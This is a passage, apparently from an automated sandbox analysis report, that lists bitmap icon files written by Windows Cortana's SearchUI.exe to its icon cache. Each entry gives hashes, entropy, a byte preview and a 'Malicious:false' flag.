                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.414692463303285
                      Encrypted:false
                      SSDEEP:768:oL4jGTv8INWdt+QYNeYEDH2tirPoCEGvR:w8Gj4h5i6p
                      MD5:F4EBFF482100DA28A335DD2EE22E4A32
                      SHA1:BBE5F2C752B40641D02CBB43D5C0FB9C53889414
                      SHA-256:802308E769A49D907538C5FA0E974313FB6E3BF29CFC8C6D1D69DDDD8CD124AF
                      SHA-512:86147C1A98CDE8389145059666A7D241035F69558183D21F2D069A2F973DE96125D5B3F3985732D47E556C09DD0D0ACB75447293700E9B45FEB798E145C5ADD1
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW........................................................................................................................................................................................................................................................................................................a].Lif.R<<K........................................................................................................................................................................................................................................................................................................................................................................8@>..(&t...Z...K.2-..;9..FCZL...(..................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.0930937878156
                      Encrypted:false
                      SSDEEP:384:ILfKDVLpluhWVCgjlXW5/+cZiseyll7Itpeqi9K3QZQAA+y/:ILi3l/YsmQseYKQe3Lt+y/
                      MD5:A89988784E4640AC2EC71F90CE85B825
                      SHA1:9E22CE33B9C1FBE81690D7D7B315CE815E72994B
                      SHA-256:679F4056018986FC3F9329155CD3A826EF7BC664BD7CB6DEC0AE07A7818CE57A
                      SHA-512:9B82109D2FE226F99D2919672734CA8DFCA74B3BC2032B406519AE96E37D33A6EF77BE655AE0BA5C54036E3AE3510EFE767E5881B17E85B04292B1558387A919
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_magnify_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.486966268894466
                      Encrypted:false
                      SSDEEP:384:Hoxo63n2QVLu1kI637kNNxjJ+RpDnc28tg2RaAePe8ENnxFWwm/i:S2Qp8kI63snjCJzpAJ
                      MD5:B6D02C4538ADB8FE15ABD21523D0D90E
                      SHA1:35B80EFF6B36FBC7BBAFEA8EAC74344B50A6D21B
                      SHA-256:82AB088934A98B069C24314ED6956EE4243622204ADF97C220A84DDFCD8A367C
                      SHA-512:9E85D6079B4D8F840E4CC4922736322519AF20415EFB0185ECFB2EA8B7E6EAF7B75D83407411DE63A89003AD3EC12F14323514EA6414F23B695E461456D93F4C
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW....................................................................................................................................................................................................................................................................................................leZD`ZQ.YSJ.\UL.jdZ.mmm.......................................................................................................................................................................................................................................................................................................................................................................vTsjZ.ZTK.YSJ.\VM.gaY.vog...................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.7889759263929514
                      Encrypted:false
                      SSDEEP:384:MykHHNBh573phU/+uxbqAsKMxozHHyxGZ+xbTJ4GLL:0N9547PMxoWxQ+z4
                      MD5:5E8789E07E5C0545251DA36BD0C8E4A5
                      SHA1:75A00B8758EC1B080C47DAE3452977E4A61F0167
                      SHA-256:5682A3FF1985EDD22549E7821899C00286687562C768C262DE1D2A542B1884FF
                      SHA-512:3A415A469A0C2F833F93A64C5025388BC83513502CDAA46F0091D11006E48EB67215FAC01953BB02C5F304D21E0F487DB1085260F0F603C554C4B19434E137CE
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_narrator_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.793507436168296
                      Encrypted:false
                      SSDEEP:384:mUjP2WuLEORPr0L34K6J3hD9cOBmEk5osHUOMaMj9lqA7zjI8bkjXFgfeO1WDx:Ej0bG3hD9ZB/sHxS9lqszjI8bEXGfBS
                      MD5:AAA4819053434A9053ECC052BF9333FE
                      SHA1:9B1FAC342A7584C594FEC050F93CAB88EFA1D60F
                      SHA-256:B640E25EEF2B6A66040EF12DFD197A11FBD0FD85EA03C9E26308E7BDE48CDE31
                      SHA-512:B0EF50FD798AD5C8FD985969674AB893843E88DCC4B53F812F4000DF4F3B24F9B99DD6AE5A1A88FD93822662FF8383AAAB7D28A2E86B3943052323EBE004B859
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...M{{{vuuu.xxx.zzz.rrr.xxx.yyy.jjj.lll.oooeooo>rrr.fff...............................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_notepad_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.001928919915705
                      Encrypted:false
                      SSDEEP:384:v1PefEMJQ6iy3mJKc+kgeonnN8R7WSBXT6YpHK7ou9YSzCrXNR2NtEx1hXQ:vRbiviy3mJ+e28PBj6YpqsdACBLx11Q
                      MD5:7689C30D53AF0DC638A76CDAC2B6755C
                      SHA1:EE74AE57C6C4867783C282B46CCE4AAEE6FCD5C3
                      SHA-256:A05BCDCFA0FDC148FC7EADAA891E11D3646B84B04F793782B7257EDD77015E35
                      SHA-512:6840A48E5725501B37455F650CABFFC17086453B6D70F943FF379F2B5B1FF9D1A72DA8DD27083C082C3ABCAACA3CBCB36DA2C7005D08811CF94B45E88392F38B
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.954813670123038
                      Encrypted:false
                      SSDEEP:768:fzheYQ/OnxvOSp4eCYapPYJ5OUVmdCZh3qZACZc7:fvQ/Onxvzp4eCvwOQ7
                      MD5:6F0D8710C462B5955D9D16745BDB1BFD
                      SHA1:ED0545934A28799EF27DDDCC0439D05DC40C47AC
                      SHA-256:342F29784A85F25EC119D85E39267EC57A4C803FBC099F6C5CEB7761F8896CFD
                      SHA-512:404085314A3CF37E8E66AECD314D63EA9711D05C1ECB714D531126E61B7BB9929E59E4A42CB736DDADE1AC416D76477881D18B428BFD603FEDE3E9EEB7B6F8CB
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................................................................................................................................................................................................................................ss\.og_ ........................................................................................................................................................................................................................................................................................................................................................................qqU.qk`-sk_.yqf.zrf.t...w.mmm...............................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_osk_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.233087509489573
                      Encrypted:false
                      SSDEEP:384:xcpYx19SVVJogXE+4dpImMEpPvBZLVVPwWBRemQkt:P9SdoB+4dkEpBZsWLemQ
                      MD5:F6A5FFE5754175D3603C3A77DCFECA6B
                      SHA1:DACD500AEEF9DD69B87FEAE7521899040E7DF1D9
                      SHA-256:FAB3529F4A4DF98271FA2F6A7860A28FDC30215144B7EEFBAF6D424A2847D035
                      SHA-512:66EC46041F1FE20203CDA7A4D68B61D2E5BCDD09A36EE8171EFA53FE92A9E6E023C5A254A4C43C110A99749829D7B99613F8D13DFB4C42656097CB8D224A531E
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.8718684725674635
                      Encrypted:false
                      SSDEEP:384:Ib/l8edt7HWlER6Ji5/nCY/rA7vAuAlRrTlG9+LyynFiOUzvw:u/XdhWly/n/sDAuG8yi
                      MD5:7279E4431C96C1030F6CCEFB5FCE7CF3
                      SHA1:E6D0C93D63C00D14E2F40F5FDBF6C3FDC3487442
                      SHA-256:64472AF7E48D716D113B1C8A8241EAA67737B21E29ABD62B4A0BFB485363AE3A
                      SHA-512:DB7FEBD66F65A486B1B77F13D8B32787C9D04E2B07003CD0DC90F4531AFE70132ED9F165AB55C012B60857BD4E6F8FE2E78F7FF132BF64A95159D7138E5DF53D
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.803071088933566
                      Encrypted:false
                      SSDEEP:768:ZgvE2waUUebe/DdqJ+n2RCpCUGXOzwy/Nt8Bj0Y:ZgsDTpXOzlNt8Bj0Y
                      MD5:7794DF1F7EA502F8B5A7AFE7458DCBD4
                      SHA1:179F413597C837600E87609DE63AE9112E3E7199
                      SHA-256:75F6713E1AE6F0CAA52D0B3957114D7653E2E002B33E1C6B173F6A584EAD94E4
                      SHA-512:2A77656D9201C8684315C1FE8693FEE206B13D072FD4164491B7A4C5FC46A3BA78216200C48B044BAD221C27423394529173F8D84A5A38DA7343231D0F7D9FBC
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.0343458593902253
                      Encrypted:false
                      SSDEEP:192:CiQAgksACxX5PGbXNbwiaWBr+XVNmKzyaoAhsAdV0LvQe:PQAgTxXadbvaWBEVlyHAhso2LvF
                      MD5:5E2DA008F38C7AD813D9FE8E669DDDD6
                      SHA1:3F4ED852167CFB251CCE13BE4906A0CBEA58F021
                      SHA-256:0CF904A532AC487F6B4C080FD01406529AD26AE559128B0AFF170F389C278C28
                      SHA-512:8D295AF13FA38384923E0DB043EF7196AE3CDDDC9DC1E765217494461C6C6F24704EB984985C45159CAE06E81CA857C4F406B1EC80BC9C8FBCCAD535A1F77D72
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.854670415110173
                      Encrypted:false
                      SSDEEP:384:HxLApd61dIMrSfSWSoXX8JAJwzzglzsJwgzz7b1J8Y:HVAe1+5ezzglzsJfzztJ8Y
                      MD5:988D8F7A55D7A70D764DFA515A4EC6CD
                      SHA1:0935B33593AE55A70833624FBB1EDD7208391FF7
                      SHA-256:DB1DDDDF683C53435B987F49F5F5B3262899451C634298BAFB3A0B122CEAA62A
                      SHA-512:3EA0E33B836E1CD0B8D034F1E4D31CFBCCAD59332CDFD0CFBF08005C32204FF930C5578350FD1AC111F109B1AE38D3621394227CBB1DA11D64AF4E46735789C8
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................333.888.'''.666.666.666.666.666.666.666.666.666.666.666.666.666.666.66
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Windows NT_Accessories_wordpad_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.7417273362835175
                      Encrypted:false
                      SSDEEP:384:UWgzpLFyyUkzIO0hARry+mGEtZMtUW4eLqpM3BE1+gJnlBxdESAUieo+1kP:UDGkzIOjLEA0tlOSAI7kP
                      MD5:309ECC1BE4C82F8F37D11BE3F08F8091
                      SHA1:DFCDAC75DFD12C3A3829472E37FD01DAABBBB0EB
                      SHA-256:99E3F8231733B8E4D7751B9175A27F0952D2480065BBF710666920AFB83BF575
                      SHA-512:3D5D7753A2D25B329F7CA10A6B5ACE805AC0E79BB02F43703AED74CF69959458E28922C7433C5FDA64C389CFC43704E94CCB77F9506D91BCA8727F376AB4ED9A
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................%...'...'...'..
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Adobe_Acrobat Reader DC_Reader_AcroRd32_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.945101500771214
                      Encrypted:false
                      SSDEEP:768:bgj/aOOOOOOOOTOOOOOOOOOOOOOOOOOOOOOOOOO9OOOOOOOOOOGOwOOOaCCCCCCe:S/
                      MD5:9A56ADE8534E9D83C3E8E49B023544C2
                      SHA1:938CA452EED1EC09B515E915579791E7269DD312
                      SHA-256:8DC2EA05A2A6B583F7C86394C76EC16994C05CC6068FE3368D824BB351670D6E
                      SHA-512:9E7FCE44A3CE54385C7B21E8D2CA274C335B29F3D25F043B2B0842EF8917C24E8F50677586FC0F0F973BEBC74FC6AC15EDC70E3601A4E86109F44CE24E3DDC68
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW...........................................................................................................................................................................................................................................1...Q...|.................................................z...N...0...........................................................................................................................................................................................................................................................................................................E..................................................................................................C..............................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_x64_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW...........................................................................................................................................................................................................................................1...Q...|.................................................z...N...0...........................................................................................................................................................................................................................................................................................................E..................................................................................................C..............................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW...........................................................................................................................................................................................................................................1...Q...|.................................................z...N...0...........................................................................................................................................................................................................................................................................................................E..................................................................................................C..............................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_x64_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW...........................................................................................................................................................................................................................................1...Q...|.................................................z...N...0...........................................................................................................................................................................................................................................................................................................E..................................................................................................C..............................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW...........................................................................................................................................................................................................................................1...Q...|.................................................z...N...0...........................................................................................................................................................................................................................................................................................................E..................................................................................................C..............................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_x64_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.327637327658332
                      Encrypted:false
                      SSDEEP:96:t6KSBgr/BnHaQt2RGHHHHHHHHHJY4zz4suN4o5FfCiKHUWjgHRYmz3sEAdQ53kp5:tv5/BHai2YDvn2F4HUWjWRYW3sE/3Ug
                      MD5:6B91588A3B75F9948D9E472F43B090D6
                      SHA1:A667BEDAE6B8F23ACF0A81C05469C1B9FFD565C8
                      SHA-256:012924F01B3F701E0286E928D2C636867A7FAF6F50CE2F72120C2A3B6CA690FB
                      SHA-512:82F5F2FD870B92A1E8AC4B4BFC381FE04CF2EE227E0BD5286D099F66E0AF864FD9C29AB3351129F91287722B2B3A5F485F3D93EE613271B13BB3EBD2B79A04C3
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW...........................................................................................................................................................................................................................................1...Q...|.................................................z...N...0...........................................................................................................................................................................................................................................................................................................E..................................................................................................C..............................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_ActiveX_VBScript
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.9474304309097916
                      Encrypted:false
                      SSDEEP:48:jDlmj1hraax2DvfG+ohTrNAg4eBDAudJ4hKO2I7dQOggBYiiqD1yB72G6nBRz9iz:jDlU1hUol9onbdaa/aarIkb
                      MD5:BAD093419BE1135CFE9694EA77088C78
                      SHA1:76204C7CA72CF666ADD9C9931389D635C82E8AF0
                      SHA-256:136808AF50EE73DF9BEFD76F7ACA21765782565B0095227C5A287F3BE0B5EF3C
                      SHA-512:3B5CB7F80D7CBC557B5A32A995CD607257AC8E56AF935CE6F64C54BA1F311A65EF00C69C69047B6EB7BB678C2B1BC0A3C37548AEF417EA49E414E1A34BCF651D
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_AutoItX_chm
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.1096298036180372
                      Encrypted:false
                      SSDEEP:768:Xmmmmmmmmmmmmmmmmmmmmmmmmmmhh666ef6S2GSS2GSR9xNh4bX78XEq5P/t4p81:W
                      MD5:A62D519BE58C4EC079CD825E04C1F4BF
                      SHA1:91C59FF74E1911D942CDB7A68EBBA42F10DC3510
                      SHA-256:9AF30E079CC36BDF17FB5FFFEBBE68B2275616F9513B07E99F15F7065A2D99C6
                      SHA-512:637A0DCED1A940AF17C47ABCDF30DC1A2AB2C1A1F70B9199789670398E87D2C9AD445F82E05FD1EA84CCCFB62D25C8253218426C1FD9784B14DD5C7BAE881B69
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................???(III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-:::'....PPP)...4...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...5:::'ddd0...$..........................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt_chm
